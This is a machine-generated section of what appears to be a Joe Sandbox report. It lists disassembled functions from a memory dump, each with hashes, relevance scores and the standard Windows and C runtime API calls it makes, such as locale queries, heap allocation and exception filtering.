API String ID:
Opcode ID: eb29d309a5c3add35b4d3f2075adbdc742dbb17db7931841c445487e0a5ce4e0
Instruction ID: 8184923a3ce9eff08f2ce8180eadf95e5683d6d470d51a05c0198b646369b935
Opcode Fuzzy Hash: eb29d309a5c3add35b4d3f2075adbdc742dbb17db7931841c445487e0a5ce4e0
Instruction Fuzzy Hash: D341A271A0011AAFCB14DF68C4949EDB7F9FF18310F5480A9E45AE7640EB31F955DBA0

Function 00B7CB40 Relevance: 1.6, APIs: 1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3dfcabd9c831d73307e096b61b416de6d7a4d06e313df4e3ab4fafd66038474b
Instruction ID: adffb8c309ea489c56cb54898d3ead74d710e5b0c725d72006f2fe5f6d7c3575
Opcode Fuzzy Hash: 3dfcabd9c831d73307e096b61b416de6d7a4d06e313df4e3ab4fafd66038474b
Instruction Fuzzy Hash: 9331777150411AAFCB15DF78D9909EDBBF8FF09320B1442AEE529E3690D731E944CB91

Function 00B7B060 Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

Part of subcall function 00B7AFC4: GetModuleHandleExW.KERNEL32(00000002,00000000,00B78A2A,?,?,00B7AF87,00B78A2A,?,00B7AF58,00B78A2A,?,?,?), ref: 00B7AFD0

FreeLibraryWhenCallbackReturns.KERNEL32(?,00000000,6126FD41,?,?,?,Function_0002BE94,000000FF), ref: 00B7B0C7

Part of subcall function 00B7AEFA: std::_Throw_Cpp_error.LIBCPMT ref: 00B7AF1B

Part of subcall function 00B7EFD2: ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,00B78E4A,00B7A2F0), ref: 00B7EFE7

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: CallbackCpp_errorExclusiveFreeHandleLibraryLockModuleReleaseReturnsThrow_Whenstd::_
String ID:
API String ID: 3627539351-0
Opcode ID: 00f679138fa764a2f8d4a55ba01bfef367c0406ad721d723a89f4f3ea6f8603d
Instruction ID: dae3948afc495c105d3671c31d7d3ac242c7bd6aaa4dbc97dd2deb68b573dd47
Opcode Fuzzy Hash: 00f679138fa764a2f8d4a55ba01bfef367c0406ad721d723a89f4f3ea6f8603d
Instruction Fuzzy Hash: E111B2336086549BCA25AB259C16E2E7BE5EF86B20F1484DAF4399BAD1CF35DC00CA51

Function 00B8CFD6 Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2357e081def17fe3eed97cc10018fd8646e80b47732b9ddb79e75cd53e95e9bc
Instruction ID: a3b603f5fed23c97c1653fe20b1f953f21dfc193f5e5002f86912cb081e8d53e
Opcode Fuzzy Hash: 2357e081def17fe3eed97cc10018fd8646e80b47732b9ddb79e75cd53e95e9bc
Instruction Fuzzy Hash: 4001F5336002185F9B16AEACEC92D1673F6FBC1720B254466F910970E5DF31D801D754

Function 00B7CB32 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: CriticalLeaveSection
String ID:
API String ID: 3988221542-0
Opcode ID: 25d66bb7fff5f64ccd0a0521eb76d196525be801358a2c45a5f9169fd881a3f3
Instruction ID: 82124453620f03027b18e65192ce622a56d4c5986cd6e499a352d1dfe8ac25fd
Opcode Fuzzy Hash: 25d66bb7fff5f64ccd0a0521eb76d196525be801358a2c45a5f9169fd881a3f3
Instruction Fuzzy Hash: 4C01217660C68A5ECB469B78B9652A8BFD0FF96334B20C1EFE02984681CB129850C380

Function 00B8D2B4 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,?,?,00B8C1B7,00000001,00000364,?,00000005,000000FF,?,00B85495,00BA8E38,0000000C), ref: 00B8D2F5

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 578fdcbb0e9db9c3e82d2cc49549a676a553e4244056e8b45fb61ab4c3b65dd2
Instruction ID: eb559a55a0f2216cfe209879ec87c3f29e6b9e7701c79f86459766b237437860
Opcode Fuzzy Hash: 578fdcbb0e9db9c3e82d2cc49549a676a553e4244056e8b45fb61ab4c3b65dd2
Instruction Fuzzy Hash: D3F0BE32605624A79F227E62DC41A5A37C8EF41BB0B2841E3AC05EB1F0DE20DC00C7A5

Function 00B77770 Relevance: 1.5, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Concurrency::details::_Release_chore.LIBCPMT ref: 00B777C6

Part of subcall function 00B7AF64: CloseThreadpoolWork.KERNEL32(?,00000000,?,00B778DA,00000000), ref: 00B7AF72

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: CloseConcurrency::details::_Release_choreThreadpoolWork
String ID:
API String ID: 312417170-0
Opcode ID: 399e7803404d43c51331cb17ac923d61ee104f9ccb743a51f4bd0382b4f66153
Instruction ID: dd8f9b9dde6dff3b5544b94a45be1678513b3d1852e84bae0508a476f9fe1488
Opcode Fuzzy Hash: 399e7803404d43c51331cb17ac923d61ee104f9ccb743a51f4bd0382b4f66153
Instruction Fuzzy Hash: 940128B1C006599BDB04EF94D84679EBBB4FB44720F048279E81967341E379AA45CAD2

Function 00B8BF11 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00B8DF35,?,?,00B8DF35,00000220,?,00000000,?), ref: 00B8BF43

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 8f69abf24d573195536ad423f0bc51546c13689737eada31963bc0590da5b044
Instruction ID: 5994297d02dae591a1a00630c4177df0b3cdae6c239ebfdac81c3e3686a2deae
Opcode Fuzzy Hash: 8f69abf24d573195536ad423f0bc51546c13689737eada31963bc0590da5b044
Instruction Fuzzy Hash: 85E06D32205621A7DB213B769C81F9A3BC8DF42BA0F2501E1EE5D961B0DF20DC00CBA1

Function 00B798F0 Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00B7990F

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: d76c936f08c726ad2d1324a8d22c8fad7cabff4ef005ff064adb6fbe689bb6e1
Instruction ID: 6fdb1a1434153e6b8389ac0e0a6d2212a15ee1ee5856e38ccbab3b454213557f
Opcode Fuzzy Hash: d76c936f08c726ad2d1324a8d22c8fad7cabff4ef005ff064adb6fbe689bb6e1
Instruction Fuzzy Hash: 1DD05E3A7050248B47147B28A814C2E6391EFC972035A4599E964D7346CB249C028A80

Non-executed Functions

Function 00B97792 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1479COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00B979A9

Strings

1#INF, xrefs: 00B978C8
1#SNAN, xrefs: 00B9789E
1#QNAN, xrefs: 00B978A5
1#IND, xrefs: 00B97897

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 78c9f26098e7f9e59c432aca77400ef780c9ace6b6780cdb1d6787eabf7a5597
Instruction ID: 2d819bbee40ad6374a7df9092e8f94ccf782a556592b9a3e210483302dc41000
Opcode Fuzzy Hash: 78c9f26098e7f9e59c432aca77400ef780c9ace6b6780cdb1d6787eabf7a5597
Instruction Fuzzy Hash: 0FD21771E186298FDF65CE28CD84BEAB7F5EB45304F1441EAD40DA7240EB78AE858F41

Function 00B91A07 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00B913BD,00000002,00000000,?,?,?,00B913BD,?,00000000), ref: 00B91AA0
GetLocaleInfoW.KERNEL32(?,20001004,00B913BD,00000002,00000000,?,?,?,00B913BD,?,00000000), ref: 00B91AC9
GetACP.KERNEL32(?,?,00B913BD,?,00000000), ref: 00B91ADE

Strings

ACP, xrefs: 00B91A25
OCP, xrefs: 00B91A5B

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 4a4b8428427dae3a982c9801b9d2256bedecd8bc1532d51afa9378a0d9e74a89
Instruction ID: 7693774284dd1cd9633a2ffce025f4e56f15c1eb62c4f61daad01fe76472283a
Opcode Fuzzy Hash: 4a4b8428427dae3a982c9801b9d2256bedecd8bc1532d51afa9378a0d9e74a89
Instruction Fuzzy Hash: E821A732702102AADF35CB6CC901A9B73E6EB51B64B9688F4E929D7110F731DD40E750

Function 00B91287 Relevance: 7.7, APIs: 5, Instructions: 182COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00B8C16A: GetLastError.KERNEL32(?,?,00B85495,00BA8E38,0000000C), ref: 00B8C16E
Part of subcall function 00B8C16A: SetLastError.KERNEL32(00000000), ref: 00B8C210

GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 00B9138F
IsValidCodePage.KERNEL32(00000000), ref: 00B913CD
IsValidLocale.KERNEL32(?,00000001), ref: 00B913E0
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00B91428
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00B91443

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: 230b8c3dd9fb6d95c145fec015306b438e90ad8e4233e8380e58fa5a355e4435
Instruction ID: b700a89b7b410bd526a8da4c87a1602a18f475bff7bd275f38938bf76686d963
Opcode Fuzzy Hash: 230b8c3dd9fb6d95c145fec015306b438e90ad8e4233e8380e58fa5a355e4435
Instruction Fuzzy Hash: 30515171A04206ABDF10EFA9CC45ABE77F8EF09740F5448B9F511EB291EB709A40DB61

Function 00B89CC0 Relevance: 6.5, APIs: 4, Instructions: 455COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3bc9877c2baeb9d2eefe3dc346bd414728ba2a6b644d6a7f2363c8b83004931b
Instruction ID: c8326d8d7ecf0d2c04684f1e2c6b6f2942f18999f43745b020912d685d6221bf
Opcode Fuzzy Hash: 3bc9877c2baeb9d2eefe3dc346bd414728ba2a6b644d6a7f2363c8b83004931b
Instruction Fuzzy Hash: 38022C71E012199BDF14EFA9C8806AEFBF1FF48314F2482AAE519E7350D731A945CB90

Function 00B91FE9 Relevance: 6.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B920D9

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 53b7145013f5e9c178033aedeabae812d01f68289ea116d7f808c358bcffd7e5
Instruction ID: 886aa6e354331661690172088da5db85268f11ed5c5a9ddf6864950ccfb2a54c
Opcode Fuzzy Hash: 53b7145013f5e9c178033aedeabae812d01f68289ea116d7f808c358bcffd7e5
Instruction Fuzzy Hash: 7571D3B1D05169AFDF25AF38DC89ABAB7F9EB05300F1441E9E048A3251DB314E85DF10

Function 00B7F8E9 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00B7F8F5
IsDebuggerPresent.KERNEL32 ref: 00B7F9C1
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00B7F9DA
UnhandledExceptionFilter.KERNEL32(?), ref: 00B7F9E4

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 3b52a0f0a31556e88d76f4d2a610dc9d1549ecbd325f8703d9cf82f69c5b29f8
Instruction ID: af4337da26ed917b2f3f5a2e375555e7c9b5f8ba4124b8bc4e18cd40ea237da4
Opcode Fuzzy Hash: 3b52a0f0a31556e88d76f4d2a610dc9d1549ecbd325f8703d9cf82f69c5b29f8
Instruction Fuzzy Hash: 0331F6B5D05219ABDF21EFA4D9497CDBBF8AF08300F1041EAE50CAB250EB719A84CF45

Function 00B91580 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 00B8C16A: GetLastError.KERNEL32(?,?,00B85495,00BA8E38,0000000C), ref: 00B8C16E
Part of subcall function 00B8C16A: SetLastError.KERNEL32(00000000), ref: 00B8C210

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00B915D4
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00B9161E
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00B916E4

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: InfoLocale$ErrorLast
String ID:
API String ID: 661929714-0
Opcode ID: b6ca11b52cfc020f974a7c42dcd20d58775c0366f8e39084dac328a983482176
Instruction ID: 70870211fca54199c71a1bdef92fcaa196da68a132355e0da51116dfbb103a57
Opcode Fuzzy Hash: b6ca11b52cfc020f974a7c42dcd20d58775c0366f8e39084dac328a983482176
Instruction Fuzzy Hash: 5B618EB19402079BEF289F68CD82BBA77E8EF05710F1485F9E905C6185EB38DD81EB50

Function 00B87E30 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00B87F28
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00B87F32
UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 00B87F3F

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 09b7a0228602d0aa8ea39089aab21eb92fba1cdcefdaf0f29ce366db5974505e
Instruction ID: c6c947db9b80132c8b5bf8896f7d8aa64e56c6819ebfced1a0a7026cf86d83dd
Opcode Fuzzy Hash: 09b7a0228602d0aa8ea39089aab21eb92fba1cdcefdaf0f29ce366db5974505e
Instruction Fuzzy Hash: 0931B274911219ABCB21EF64D88978DBBF8BF08310F5041EAE41CA7261EB709F85CF45

